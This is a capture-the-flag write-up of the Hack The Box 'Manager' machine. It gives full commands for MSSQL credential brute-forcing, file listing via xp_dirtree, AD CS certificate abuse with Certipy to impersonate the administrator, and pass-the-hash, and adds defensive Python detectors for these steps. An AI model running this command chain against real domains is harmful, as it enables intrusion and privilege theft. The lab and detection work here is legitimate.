Hack The Box Manager

Jp-Sec
5 min read · Mar 16, 2024

Initial Access

First of all, we start with an Nmap TCP scan to discover which ports are open:

nmap -sC -sV -Pn <target ip>

The Nmap scan revealed numerous open ports. Initially, I attempted manual enumeration of the website (source code, Gobuster, etc.), but since it is a static website, I didn’t find anything interesting.

We can see that this is an Active Directory machine, so I added manager.htb and dc01.manager.htb to my /etc/hosts file.

Kerberos is open, so let’s see if we can enumerate some users with the tool Kerbrute:

kerbrute userenum -d manager.htb --dc <target ip> /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt

We discovered new usernames! Let’s put them in a file named user.txt

So now we have a list of usernames. I tried more Kerberos attacks, but nothing worked. From the Nmap scan, we can see MSSQL is open on port 1433. Let’s see if we can do something.

Doing some research, I discovered that Metasploit has a module to brute-force MSSQL logins.

I will use auxiliary/scanner/mssql/mssql_login

use auxiliary/scanner/mssql/mssql_login

set rhosts <target ip>

set user_file user.txt

set USER_AS_PASS true

set USE_WINDOWS_AUTHENT true

set verbose false

exploit

We see that the user operator is using operator as its password.
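From the defender’s side, the mssql_login run above leaves a very recognisable trace: one client address failing against many different accounts within seconds (Event ID 18456 / “Login failed for user” lines in the SQL Server ERRORLOG). As an added example, not part of the original write-up or of any tool it uses, here is a small Python detector that parses such lines and flags a client that fails against several distinct accounts inside a short window, and reports any account that then logged in successfully from the same client. The log lines are constructed for the example; the “Login succeeded” line only appears in a real ERRORLOG when the server’s login auditing is set to record successful logins as well as failures.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in SQL Server ERRORLOG format (not from the
# write-up's target). Usernames and client addresses are made up.
SAMPLE_LOG = """\
2024-03-16 10:12:01.23 Logon       Login failed for user 'MANAGER\\zhong'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-03-16 10:12:01.41 Logon       Login failed for user 'MANAGER\\cheng'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-03-16 10:12:01.58 Logon       Login failed for user 'MANAGER\\ryan'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-03-16 10:12:01.77 Logon       Login failed for user 'MANAGER\\raven'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-03-16 10:12:01.95 Logon       Login failed for user 'MANAGER\\jinwoo'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.14.5]
2024-03-16 10:12:02.12 Logon       Login succeeded for user 'MANAGER\\operator'. Connection made using Windows authentication. [CLIENT: 10.10.14.5]
2024-03-16 11:40:10.00 Logon       Login failed for user 'MANAGER\\raven'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.1.23]
"""

# Timestamp, outcome, account and client address of one Logon line
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) Logon\s+"
    r"Login (?P<result>failed|succeeded) for user '(?P<user>[^']+)'.*"
    r"\[CLIENT: (?P<client>[^\]]+)\]$"
)


def parse_logon_events(text):
    """Turn ERRORLOG text into a list of logon event dicts; non-logon lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({
                "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                "result": m["result"],
                "user": m["user"].lower(),
                "client": m["client"],
            })
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=4):
    """One alert per client that failed against >= min_users distinct accounts
    inside `window`, with any account that later succeeded from that client."""
    by_client = defaultdict(list)
    for e in events:
        by_client[e["client"]].append(e)

    alerts = []
    for client, evs in by_client.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["result"] == "failed"]
        for i, first in enumerate(failures):
            # Failures from this client that fall inside the window opened by `first`
            in_window = [f for f in failures[i:] if f["ts"] - first["ts"] <= window]
            users = {f["user"] for f in in_window}
            if len(users) >= min_users:
                success_after = sorted({
                    e["user"] for e in evs
                    if e["result"] == "succeeded" and e["ts"] >= first["ts"]
                })
                alerts.append({
                    "client": client,
                    "distinct_users": len(users),
                    "first_seen": first["ts"],
                    "success_after": success_after,
                })
                break  # one alert per client is enough
    return alerts


if __name__ == "__main__":
    for a in detect_spray(parse_logon_events(SAMPLE_LOG)):
        print(a)
```

Tuning the window and the distinct-account threshold is the whole game: a spray that tries one password across every name in a user list is exactly what a low threshold over a short window catches, while a single user mistyping a password (the 10.10.1.23 line above) stays below it.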

Let’s now connect to the MSSQL database; we can use Impacket’s mssqlclient.py:

impacket-mssqlclient -port 1433 manager/operator:operator@<target ip> -windows-auth

I found a useful command on StackOverflow related to xp_dirtree. This stored procedure lets us list local directories from inside SQL Server.

Let’s try out this command

EXEC MASTER.sys.xp_dirtree 'C:\', 1, 1

Indeed, it works! We can successfully see the contents of the C:\ directory. Now it’s time for enumeration

After enumeration, I found that the folder C:\inetpub\wwwroot contains a website backup zip file:

EXEC MASTER.sys.xp_dirtree 'C:\inetpub\wwwroot\', 1, 1

Because it is in the web folder, we can download it with wget from our attacker machine

wget http://<target ip>/website-backup-27-07-23-old.zip

Let’s see if we can find juicy information. I’ll create a folder named website and unzip the archive into it:

mkdir website

unzip website-backup-27-07-23-old.zip -d website

With ls -la inside the website folder, we can see that there’s a file named .old-conf.xml. This seems interesting:

cat .old-conf.xml

We found the user raven and the password R4v3nBe5tD3veloP3r!123.

We can connect with evil-winrm and get the user flag:

evil-winrm -i <target ip> -u raven -p 'R4v3nBe5tD3veloP3r!123'

Privilege Escalation

I always start my post-exploitation with some manual enumeration.

Let’s get started; first I will enumerate the current user’s groups:

whoami /groups

We can see that the user Raven is in the Certificate Service DCOM Access group.

A quick search for “certificate service dcom exploit” led me to this HackTricks post.

In the article, there are a couple of methods listed. We need to find the right one

To do so, we can use the tools Certipy and BloodHound.

First, we will use the Certipy command that you can find in the HackTricks post. Do not forget the -old-bloodhound flag; otherwise the BloodHound output will not be compatible with the current version of BloodHound:

certipy find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip <target ip> -old-bloodhound

This will generate a JSON file that we can read. The file is very big, so we can use grep to filter for “ESC” and get a better view:

grep "ESC" 20231024130019_Certipy.json

Great! Now we know which attack we need to do for privilege escalation.

We will use attack 2 from the HackTricks method. These commands are time-sensitive, so you need to execute all of them very quickly for the chain to work. I suggest typing all of the commands beforehand; if you don’t, the last command will fail.

These are all my commands:

certipy ca -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip <target ip> -ca 'manager-DC01-CA' -add-officer 'raven'

certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -template SubCA -upn administrator@manager.htb

certipy ca -ca 'manager-DC01-CA' -issue-request 13 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'

certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 13

certipy auth -pfx "administrator.pfx" -dc-ip <target ip> -username 'administrator' -domain 'manager.htb'

In the screenshot you can see that I got the error KDC_ERR_PADATA_TYPE_NOSUPP (KDC has no support for padata type). If you get this error, or you didn’t run the commands fast enough and got a clock error, do the following:

sudo ntpdate -s manager.htb

certipy req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -target dc01.manager.htb -retrieve 13

certipy auth -pfx "administrator.pfx" -dc-ip <target ip> -username 'administrator' -domain 'manager.htb'

Now that we have the administrator’s NT hash, we can do a pass-the-hash attack with evil-winrm:

evil-winrm -i <target ip> -u administrator -H <administrator hash>
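Every step of the escalation above is audited by the domain controller when AD CS auditing is turned on: adding an officer changes the CA’s security descriptor (Event ID 4882, or 4890 for certificate-manager settings), the SubCA request and its issuance produce 4886 and 4887, the resulting TGT shows up as 4768 with PKINIT pre-authentication, and the final evil-winrm session is an NTLM network logon (4624). As an added example, not part of the write-up, here is Python detection logic that runs three rules over such events: a CA permission change by an account outside an allow-list, a certificate issued to an identity other than its requester, and a PKINIT TGT for that impersonated identity shortly afterwards. The event records are constructed for the example; the field names follow the EventData names of those events, and the Requester/Subject formats and the allow-list are assumptions.

```python
from datetime import datetime, timedelta

# Constructed Windows Security / AD CS audit events (not from the write-up's
# target). Field names mirror the EventData names of each event; that mapping
# and the Requester/Subject formats are assumptions for this example.
EVENTS = [
    {"id": 4882, "ts": "2024-03-16T12:00:01", "SubjectUserName": "raven",
     "Service": "manager-DC01-CA"},
    {"id": 4886, "ts": "2024-03-16T12:00:05", "Requester": "MANAGER\\raven",
     "Attributes": "CertificateTemplate:SubCA"},
    {"id": 4887, "ts": "2024-03-16T12:00:20", "Requester": "MANAGER\\raven",
     "Subject": "CN=Administrator", "Attributes": "CertificateTemplate:SubCA"},
    {"id": 4768, "ts": "2024-03-16T12:00:40", "TargetUserName": "administrator",
     "PreAuthType": "16", "IpAddress": "10.10.14.5"},
    {"id": 4624, "ts": "2024-03-16T12:01:00", "TargetUserName": "administrator",
     "LogonType": "3", "AuthenticationPackageName": "NTLM", "IpAddress": "10.10.14.5"},
    # A benign issuance: requester and subject are the same account
    {"id": 4887, "ts": "2024-03-16T13:00:00", "Requester": "MANAGER\\zhong",
     "Subject": "CN=zhong", "Attributes": "CertificateTemplate:User"},
]

CA_CONFIG_EVENTS = {4882, 4890}          # CA security descriptor / cert-manager settings changed
EXPECTED_CA_ADMINS = {"administrator"}   # constructed allow-list of who may change CA config
PKINIT_PREAUTH = "16"                    # PA-PK-AS-REQ: TGT requested with a certificate


def account(name):
    """'MANAGER\\raven' -> 'raven'; 'CN=Administrator' -> 'administrator'."""
    return name.split("\\")[-1].split("=")[-1].lower()


def at(event):
    return datetime.fromisoformat(event["ts"])


def detect_adcs_abuse(events, window=timedelta(minutes=10)):
    """Return (rule, detail, timestamp) alerts for the three rules described above."""
    evs = sorted(events, key=at)
    alerts = []
    for e in evs:
        # Rule 1: CA permissions or certificate-manager settings changed by
        # someone who is not on the allow-list
        if e["id"] in CA_CONFIG_EVENTS and account(e["SubjectUserName"]) not in EXPECTED_CA_ADMINS:
            alerts.append(("CA-PERMISSION-CHANGE", account(e["SubjectUserName"]), e["ts"]))

        # Rule 2: a certificate was issued to an identity other than the requester
        if e["id"] == 4887:
            requester, subject = account(e["Requester"]), account(e["Subject"])
            if requester != subject:
                alerts.append(("IDENTITY-MISMATCH-ISSUANCE", f"{requester}->{subject}", e["ts"]))

                # Rule 3: the impersonated identity then obtains a TGT via PKINIT
                # within `window` of the issuance
                for f in evs:
                    if (f["id"] == 4768
                            and f.get("PreAuthType") == PKINIT_PREAUTH
                            and account(f["TargetUserName"]) == subject
                            and timedelta(0) <= at(f) - at(e) <= window):
                        alerts.append(("PKINIT-AFTER-MISMATCH", subject, f["ts"]))
    return alerts


if __name__ == "__main__":
    for rule, detail, ts in detect_adcs_abuse(EVENTS):
        print(f"{ts} {rule}: {detail}")
```

Rule 2 on its own is noisy in environments where enrollment agents legitimately request certificates on behalf of others, which is why the example pairs it with the CA permission change before it and the PKINIT logon after it; the three together are the shape of the chain this write-up walks through.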
